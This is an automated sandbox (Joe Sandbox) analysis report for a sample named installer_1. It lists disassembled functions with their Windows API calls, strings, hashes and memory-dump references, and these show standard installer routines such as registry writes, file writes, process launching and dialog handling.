Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

F, xrefs: 00406AE8
[Rename], xrefs: 00406BC8, 00406BD7
NUL, xrefs: 00406A9E
%s=%s, xrefs: 00406B43

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012800,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

